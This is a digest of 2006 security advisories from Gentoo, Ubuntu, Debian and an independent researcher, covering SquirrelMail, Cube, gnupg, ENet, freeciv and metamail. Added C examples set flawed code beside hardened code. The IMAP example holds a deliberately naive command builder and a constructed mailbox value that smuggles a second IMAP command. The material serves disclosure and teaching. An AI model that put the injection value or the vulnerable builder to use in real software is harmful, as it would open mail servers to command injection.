[ GLSA 200603-09 ] SquirrelMail: Cross-site scripting and IMAP command injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200603-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: SquirrelMail: Cross-site scripting and IMAP command injection
      Date: March 12, 2006
      Bugs: #123781
        ID: 200603-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SquirrelMail is vulnerable to several cross-site scripting vulnerabilities
and IMAP command injection.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports the IMAP and
SMTP protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  mail-client/squirrelmail     < 1.4.6                      >= 1.4.6

Description
===========

SquirrelMail does not validate the right_frame parameter in webmail.php,
possibly allowing frame replacement or cross-site scripting
(CVE-2006-0188). Martijn Brinkers and Scott Hughes discovered that
MagicHTML fails to handle certain input correctly, potentially leading to
cross-site scripting (only Internet Explorer, CVE-2006-0195). Vicente
Aguilera reported that the sqimap_mailbox_select function did not strip
newlines from the mailbox or subject parameter, possibly allowing IMAP
command injection (CVE-2006-0377).

Impact
======

By exploiting the cross-site scripting vulnerabilities, an attacker can
execute arbitrary scripts running in the context of the victim's browser.
This could lead to a compromise of the user's webmail account, cookie
theft, etc. A remote attacker could exploit the IMAP command injection to
execute arbitrary IMAP commands on the configured IMAP server.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.6"

Note: Users with the vhosts USE flag set should manually use webapp-config
to finalize the update.

References
==========

  [ 1 ] CVE-2006-0188
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0188
  [ 2 ] CVE-2006-0195
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0195
  [ 3 ] CVE-2006-0377
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0377

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
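The IMAP command injection described above (CVE-2006-0377) comes from passing a mailbox name containing CR/LF straight into a command line. The following is an added example written for this page, not SquirrelMail's PHP code: a naive builder that reproduces the flaw next to one that encodes the name as an RFC 3501 quoted string and refuses names that cannot be represented. The tag "A001" and the 512-byte quoting buffer are constructed values.

```c
/* Added example (not SquirrelMail code): passing a user-controlled mailbox
 * name to an IMAP server without letting it break out of the command line. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Write one byte, always keeping room for the closing quote and the NUL. */
static int put(char *out, size_t outlen, size_t *o, char ch)
{
    if (*o + 2 >= outlen) return -1;
    out[(*o)++] = ch;
    return 0;
}

/* Encode name as an IMAP quoted string: CR and LF are not allowed inside
 * (they would end the command line), '"' and '\\' are backslash-escaped.
 * Returns the length written, or -1 if the name cannot be represented. */
int imap_quote(const char *name, char *out, size_t outlen)
{
    size_t o = 0;
    if (put(out, outlen, &o, '"') < 0) return -1;
    for (; *name; name++) {
        unsigned char c = (unsigned char)*name;
        if (c == '\r' || c == '\n') return -1;      /* would inject a second command */
        if (c == '"' || c == '\\')
            if (put(out, outlen, &o, '\\') < 0) return -1;
        if (put(out, outlen, &o, (char)c) < 0) return -1;
    }
    if (o + 1 >= outlen) return -1;
    out[o++] = '"';
    out[o] = '\0';
    return (int)o;
}

/* Mirrors the flaw the advisory describes: the name is dropped into the
 * command unchanged, so CR/LF inside it terminates the line early. */
int build_select_naive(const char *tag, const char *mailbox, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s SELECT \"%s\"\r\n", tag, mailbox);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Hardened form: the name is quoted first and rejected if that fails. */
int build_select_safe(const char *tag, const char *mailbox, char *out, size_t outlen)
{
    char quoted[512];
    if (imap_quote(mailbox, quoted, sizeof quoted) < 0) return -1;
    int n = snprintf(out, outlen, "%s SELECT %s\r\n", tag, quoted);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Number of CRLF-terminated lines the server would see; a correctly built
 * command is exactly one. */
int imap_line_count(const char *buf)
{
    int lines = 0;
    for (const char *p = strstr(buf, "\r\n"); p; p = strstr(p + 2, "\r\n"))
        lines++;
    return lines;
}

/* Convenience wrappers: how many command lines each builder emits for a
 * given mailbox name, or -1 if the builder refuses it. */
int lines_naive(const char *mailbox)
{
    char buf[1024];
    if (build_select_naive("A001", mailbox, buf, sizeof buf) < 0) return -1;
    return imap_line_count(buf);
}

int lines_safe(const char *mailbox)
{
    char buf[1024];
    if (build_select_safe("A001", mailbox, buf, sizeof buf) < 0) return -1;
    return imap_line_count(buf);
}

int main(void)
{
    /* Constructed mailbox name carrying an embedded CRLF and a second tag. */
    const char *hostile = "INBOX\"\r\nA002 NOOP";
    printf("naive builder emits %d line(s)\n", lines_naive(hostile));   /* 2 */
    printf("safe builder result: %d\n", lines_safe(hostile));          /* -1 */
    return 0;
}
```

The safe builder fails closed: a name with CR or LF is not "cleaned", it is refused, which is the behaviour you want in a client that has no legitimate reason to send such a name. The same quoting logic applies to the subject parameter the advisory mentions, and to any other user-supplied atom placed into an IMAP command.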
[ GLSA 200603-10 ] Cube: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200603-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Cube: Multiple vulnerabilities
      Date: March 13, 2006
      Bugs: #125289
        ID: 200603-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Cube is vulnerable to a buffer overflow, invalid memory access and remote
client crashes, possibly leading to a Denial of Service or remote code
execution.

Background
==========

Cube is an open source first person shooter game engine supporting
multiplayer via LAN or internet.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  games-fps/cube               <= 20050829                Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===========

Luigi Auriemma reported that Cube is vulnerable to a buffer overflow in
the sgetstr() function (CVE-2006-1100) and that the sgetstr() and
getint() functions fail to verify the length of the supplied argument,
possibly leading to the access of invalid memory regions (CVE-2006-1101).
Furthermore, he discovered that a client crashes when asked to load
specially crafted mapnames (CVE-2006-1102).

Impact
======

A remote attacker could exploit the buffer overflow to execute arbitrary
code with the rights of the user running cube. An attacker could also
exploit the other vulnerabilities to crash a Cube client or server,
resulting in a Denial of Service.

Workaround
==========

Play solo games or restrict your multiplayer games to trusted parties.

Resolution
==========

Upstream stated that there will be no fixed version of Cube, thus the
Gentoo Security Team decided to hardmask Cube for security reasons.

All Cube users are encouraged to uninstall Cube:

    # emerge --ask --unmerge games-fps/cube

References
==========

  [ 1 ] CVE-2006-1100
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1100
  [ 2 ] CVE-2006-1101
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1101
  [ 3 ] CVE-2006-1102
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1102

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
[USN-262-1] Ubuntu 5.10 installer password disclosure
===========================================================
Ubuntu Security Notice USN-262-1               March 12, 2006
Ubuntu 5.10 installer vulnerability
https://launchpad.net/bugs/34606
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

base-config
passwd

The problem can be corrected by upgrading the affected package to
version 2.67ubuntu20 (base-config) and 1:4.0.3-37ubuntu8 (passwd). In
general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Karl Øie discovered that the Ubuntu 5.10 installer failed to clean
passwords in the installer log files. Since these files were
world-readable, any local user could see the password of the first
user account, which has full sudo privileges by default.

The updated packages remove the passwords and additionally make the
log files readable only by root.

This does not affect the Ubuntu 4.10, 5.04, or the upcoming 6.04
installer. However, if you upgraded from Ubuntu 5.10 to the current
development version of Ubuntu 6.04 ('Dapper Drake'), please ensure
that you upgrade the passwd package to version 1:4.0.13-7ubuntu2 to
fix the installer log files.

Source archives:

  http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.dsc
      Size/MD5:      758 c22bb6e3be4d59aa93e84327f60e89ab
  http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.tar.gz
      Size/MD5:   577194 99eabbe70227169feaff28ff9062d097
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.diff.gz
      Size/MD5:  1067297 9db7bb924125a5587380efc08f6787e1
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.dsc
      Size/MD5:      876 50cdfae3bfbe1bb1bb4be192d7de19a7
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3.orig.tar.gz
      Size/MD5:  1045704 b52dfb2e5e8d9a4a2aae0ca1b266c513

Architecture independent packages:

  http://security.ubuntu.com/ubuntu/pool/main/b/base-config/apt-setup-udeb_2.67ubuntu20_all.udeb
      Size/MD5:     3298 dd42b2901f6f5d7525083c27cbb23407
  http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20_all.deb
      Size/MD5:   291224 e95d7a1d25074ea57d444e817cef1850
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
      Size/MD5:     1740 6c7bc8e12968d9876b6e1b27f0476484
  http://security.ubuntu.com/ubuntu/pool/main/b/base-config/tzsetup-udeb_2.67ubuntu20_all.udeb
      Size/MD5:     2760 f6ebc84fd2bff0275b1e64d53fdc9955

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb
      Size/MD5:   180662 de75ded6034f0d7226dfbf0ec66e2be7
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb
      Size/MD5:   589790 f90c48af4e1c55202f22127e72dbf45d

i386 architecture (x86 compatible Intel/AMD)

  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb
      Size/MD5:   171882 347fa929d15c3689bd68fc487cc116c6
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb
      Size/MD5:   515580 b8c965e4a5c40d1c50e8816aeef689bc

powerpc architecture (Apple Macintosh G3/G4/G5)

  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb
      Size/MD5:   179886 42ebfcd496b621bdab29e9a6b3f50522
  http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb
      Size/MD5:   568426 089edb3f8110ab191bba6d061b199385
[USN-264-1] gnupg vulnerability
===========================================================
Ubuntu Security Notice USN-264-1               March 13, 2006
gnupg vulnerability
CVE-2006-0049
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gnupg

The problem can be corrected by upgrading the affected package to
version 1.2.4-4ubuntu2.3 (for Ubuntu 4.10), 1.2.5-3ubuntu5.3 (for
Ubuntu 5.04), or 1.4.1-1ubuntu1.2 (for Ubuntu 5.10). In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Tavis Ormandy discovered a flaw in gnupg's signature verification. In
some cases, certain invalid signature formats could cause gpg to report
a 'good signature' result for auxiliary unsigned data which was
prepended or appended to the checked message part.

Updated packages for Ubuntu 4.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.diff.gz
      Size/MD5:    60031 fc55a23607cfac514084704155760cc8
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.dsc
      Size/MD5:      621 c0d08dda5a9b2bd3f130b94784082dc5
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4.orig.tar.gz
      Size/MD5:  3451202 adfab529010ba55533c8e538c0b042a2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_amd64.deb
      Size/MD5:  1722782 8556e99b322bdf18ef7bad54329410df

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_i386.deb
      Size/MD5:  1667764 410203ad10b3eb7faa56950958af

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_powerpc.deb
      Size/MD5:  1721814 c6038008b123518fbf75f8547e1619a5

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.diff.gz
      Size/MD5:    66069 42bba8259f5a074b89da1bb422889f1b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.dsc
      Size/MD5:      654 5930a6888f76f726ea7076eff76f14e9
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5.orig.tar.gz
      Size/MD5:  3645308 9109ff94f7a502acd915a6e61d28d98a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_amd64.deb
      Size/MD5:   805910 4d69ba91dd0d2c79b54725d1bd139923
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_amd64.udeb
      Size/MD5:   146442 a603783255829e50e444e859321e0001

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_i386.deb
      Size/MD5:   750516 f8d97e8702866e76ba7b6ea5f946c4f0
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_i386.udeb
      Size/MD5:   121348 1feb52e0c56d73302477a99569147519

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_powerpc.deb
      Size/MD5:   806396 36ba1f3473c45060151e8f2089261172
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_powerpc.udeb
      Size/MD5:   135406 a92ce4e3384f840cf48dc50de94c9d8d

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.diff.gz
      Size/MD5:    20510 acff054f7255a23ce8cd7595a68ca2b8
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.dsc
      Size/MD5:      684 70749478363ef5374259a66ef5517bb7
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz
      Size/MD5:  4059170 1cc77c6943baaa711222e954bbd785e5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_amd64.deb
      Size/MD5:  1136048 31643c8b2e3cfcd8774ad17ceb5e8e0c
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_amd64.udeb
      Size/MD5:   152158 b7b70b5ee13b46854b9383b2a280aea0

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_i386.deb
      Size/MD5:  1044172 cdf0e85e58ba4b760741a72c5c7e6603
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_i386.udeb
      Size/MD5:   130664 2719e86828d066102cade3457de20a6a

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_powerpc.deb
      Size/MD5:  1119252 208607aed4a4b0a4e27dc503e3c2147c
directory traversal Fixed in DirectContact 0.3c
Hi,

This security hole is fixed in version 0.3c. The patch is automatically
applied when DirectContact is restarted.

Regards,
Lionel Reyero
[SECURITY] [DSA 994-1] New freeciv packages fix denial of service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 994-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 13th, 2006                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : freeciv
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-0047
BugTraq ID     : 16975
Debian Bug     : 355211

Luigi Auriemma discovered a denial of service condition in the free
Civilization server that allows a remote user to trigger a server crash.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 2.0.1-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.8-1.

We recommend that you upgrade your freeciv-server package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.dsc
      Size/MD5 checksum:      997 bccef322ab4d8f0587818c489599133a
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.diff.gz
      Size/MD5 checksum:    44229 be1666c210b9d3e7e9161106b68abb10
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1.orig.tar.gz
      Size/MD5 checksum: 11086541 2deea98d258138325f590ec52d530a96

  Architecture independent components:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-data_2.0.1-1sarge1_all.deb
      Size/MD5 checksum:  3843498 fc7fd56c3c37efc8489be7880f5d2384
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-gtk_2.0.1-1sarge1_all.deb
      Size/MD5 checksum:    11368 7edc101b169b712d3be5dc5433dc4bbb
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-xaw3d_2.0.1-1sarge1_all.deb
      Size/MD5 checksum:    11372 d5d9e78a83c5a5d534d56a0ffc393acf
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1_all.deb
      Size/MD5 checksum:    11360 7d948bf16bc697808e805e46211b4e08

  Alpha architecture:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_alpha.deb
      Size/MD5 checksum:   590368 f9d6ab21f6341eaf0e3dacf87b59ad32
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_alpha.deb
      Size/MD5 checksum:   514694 a6e39f77c6951b97b9befbec19d892bf
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_alpha.deb
      Size/MD5 checksum:   591244 4c331477f15855f6eb488ac47ebd0c38

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_amd64.deb
      Size/MD5 checksum:   476454 fbdb18b936d0cec1c3722162e8bd964a
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_amd64.deb
      Size/MD5 checksum:   409102 7f2fa87b7ffd9ff84a85a35b3d82dc07
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_amd64.deb
      Size/MD5 checksum:   465942 480cb2efba03369e28b77647841859e9

  ARM architecture:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_arm.deb
      Size/MD5 checksum:   423194 0f7e6820a48890e8e82669ff0bbd4422
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_arm.deb
      Size/MD5 checksum:   361728 7eb46efcc7bcc3f3a56c3a283dad1f97
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_arm.deb
      Size/MD5 checksum:   419804 d9eb16ebbd1a601f2dbcf1bd03982316

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_i386.deb
      Size/MD5 checksum:   440936 6c2ff70b8d5980f30662ee1ed23c6a59
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_i386.deb
      Size/MD5 checksum:   366828 909f29a8fadf9241525f71c0f3e7c59f
    http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_i386.deb
      Size/MD5 checksum:   430250 3a04f91ae1487a9b9624045426a54247

  Intel IA-64 architecture:
Multiple vulnerabilities in ENet library (Jul 2005)
#######################################################################

                             Luigi Auriemma

Application:  ENet library
              http://enet.bespin.org
Versions:     <= Jul 2005 (it's the current CVS version)
Platforms:    Windows, *nix, *BSD and more
Bugs:         A] invalid memory access (32 bit)
              B] allocation abort with fragment
Exploitation: remote
Date:         12 Mar 2006
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

ENet is a powerful open source library for handling UDP connections (it
can be defined almost as a sort of TCP over UDP).
It's widely used in some games and engines like Cube, Sauerbraten,
Duke3d_w32 and others.

#######################################################################

=======
2) Bugs
=======

---------------------------------
A] invalid memory access (32 bit)
---------------------------------

ENet uses 32 bit numbers for almost all the parameters in its packets,
like fragment offsets, data size, timestamps, challenge numbers and so
on.
Each packet received by the library (enet_host_service) is handled by
the enet_protocol_handle_incoming_commands function. This function uses
a pointer (currentData) which points to the current command; each packet
can contain one or more commands which describe operations like a
connection request, an acknowledge, a fragment, a message and more.
The instruction which checks this pointer, to avoid that it points past
the received packet, can be eluded through a big (negative on a 32 bit
CPU) header.commandLength parameter. After having bypassed the check,
currentData will point to an invalid zone of memory, and when the cycle
continues on the subsequent command (commandCount must be greater than
one) the application will crash.
64 bit CPUs should not be vulnerable.

From enet_protocol_handle_incoming_commands in protocol.c:

    ...
    currentData = host -> receivedData + sizeof (ENetProtocolHeader);

    while (commandCount > 0 &&
           currentData < & host -> receivedData [host -> receivedDataLength])
    {
        command = (ENetProtocol *) currentData;

        if (currentData + sizeof (ENetProtocolCommandHeader) > & host -> receivedData [host -> receivedDataLength])
          return 0;

        command -> header.commandLength = ENET_NET_TO_HOST_32 (command -> header.commandLength);

        if (currentData + command -> header.commandLength > & host -> receivedData [host -> receivedDataLength])
          return 0;

        -- commandCount;
        currentData += command -> header.commandLength;
    ...

----------------------------------
B] allocation abort with fragment
----------------------------------

ENet also supports the handling of fragments used to build messages
bigger than the receiver's MTU.
When a fragment is received the library allocates the total message size
in memory so it can easily rebuild all the subsequent fragments in this
buffer.
If the total data size specified by the attacker cannot be allocated,
the library calls abort() and the whole program terminates.

From enet_protocol_handle_send_fragment in protocol.c:

    ...
    startCommand = enet_peer_queue_incoming_command (peer, hostCommand, enet_packet_create (NULL, totalLength, ENET_PACKET_FLAG_RELIABLE), fragmentCount);

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/enetx.zip

#######################################################################

======
4) Fix
======

No fix.
No reply from the developers.

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org
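Both ENet bugs, and the Cube sgetstr()/getint() length problems in the GLSA earlier on this page, are the same class of defect: a length taken from the wire is trusted to bound a pointer or an allocation. The following is an added example written for this page; it is neither ENet's nor Cube's code. It emulates the quoted pointer check with 32-bit address arithmetic to show how a large commandLength slips through, then gives the offset-based form that cannot wrap, a datagram walker built on it, and a sanity check on a fragment's announced total size before any allocation. CMD_HDR_LEN, MAX_MESSAGE and the 4-byte big-endian length layout are assumptions for the example; ENet's real command header and the PoC linked above are different.

```c
/* Added example (not ENet or Cube code): bounding wire-supplied lengths by
 * the bytes that remain, never by pointer arithmetic. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define CMD_HDR_LEN 4u              /* assumed: 4-byte big-endian length field starts each command */
#define MAX_MESSAGE (64u * 1024u)   /* assumed: largest message the receiver will reassemble */

/* The quoted check, emulated in 32-bit address arithmetic. cur and end stand
 * for currentData and &receivedData[receivedDataLength]. Returns 1 when the
 * check lets the command through. */
int length_check_vulnerable(uint32_t cur, uint32_t end, uint32_t cmd_len)
{
    uint32_t next = cur + cmd_len;   /* wraps modulo 2^32, exactly like a 32-bit pointer */
    if (next > end) return 0;        /* "if (currentData + commandLength > &...) return 0;" */
    return 1;
}

/* Same decision made on the byte budget: a huge cmd_len can never pass. */
int length_check_safe(uint32_t cur, uint32_t end, uint32_t cmd_len)
{
    if (cur > end) return 0;
    uint32_t remaining = end - cur;
    return cmd_len >= CMD_HDR_LEN && cmd_len <= remaining;
}

static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Walk the commands of one datagram by offset. Returns the number of
 * commands consumed, or -1 on a malformed packet. */
int walk_commands(const unsigned char *pkt, size_t len, unsigned command_count)
{
    size_t off = 0;
    int parsed = 0;
    while (command_count > 0 && off < len) {
        size_t remaining = len - off;
        if (remaining < CMD_HDR_LEN) return -1;          /* header itself would overrun */
        uint32_t cmd_len = be32(pkt + off);
        /* too small: the loop would never advance; too large: overrun */
        if (cmd_len < CMD_HDR_LEN || cmd_len > remaining) return -1;
        off += cmd_len;
        command_count--;
        parsed++;
    }
    return parsed;
}

/* Bug B: accept a fragment's announced total only if it is within the cap
 * and consistent with the fragment count, so no allocation is attempted
 * for a hostile totalLength. */
int fragment_total_ok(uint32_t total_length, uint32_t fragment_count, uint32_t fragment_size)
{
    if (fragment_size == 0 || fragment_size > MAX_MESSAGE) return 0;
    if (total_length == 0 || total_length > MAX_MESSAGE) return 0;
    /* both operands are capped, so this ceiling division cannot overflow */
    uint32_t expected = (total_length + fragment_size - 1) / fragment_size;
    return fragment_count == expected;
}

int main(void)
{
    /* Constructed addresses: a 1 KiB packet at 0x1000, and a commandLength
     * that is "negative" when read as a 32-bit signed value. */
    printf("vulnerable check accepts 0xFFFFFF00: %d\n",
           length_check_vulnerable(0x1000, 0x1400, 0xFFFFFF00u));   /* 1 */
    printf("safe check accepts 0xFFFFFF00:       %d\n",
           length_check_safe(0x1000, 0x1400, 0xFFFFFF00u));         /* 0 */
    return 0;
}
```

On a 64-bit build the pointer addition in the vulnerable form does not wrap for a 32-bit length, which is why the advisory notes that 64-bit CPUs should not be affected; the offset-based check is correct on both.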
[SECURITY] [DSA 995-1] New metamail packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 995-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                                 Steve Kemp
March 13th, 2006                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : metamail
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-0709
BugTraq ID     : 16611
Debian Bug     : 352482

Ulf Harnhammar discovered a buffer overflow in metamail, an
implementation of MIME (Multi-purpose Internet Mail Extensions), that
could lead to a denial of service or potentially execute arbitrary code
when processing messages.

For the old stable distribution (woody) this problem has been fixed in
version 2.7-45woody.4.

For the stable distribution (sarge) this problem has been fixed in
version 2.7-47sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.7-51.

We recommend that you upgrade your metamail package.

Upgrade Instructions
- --------------------

wget url
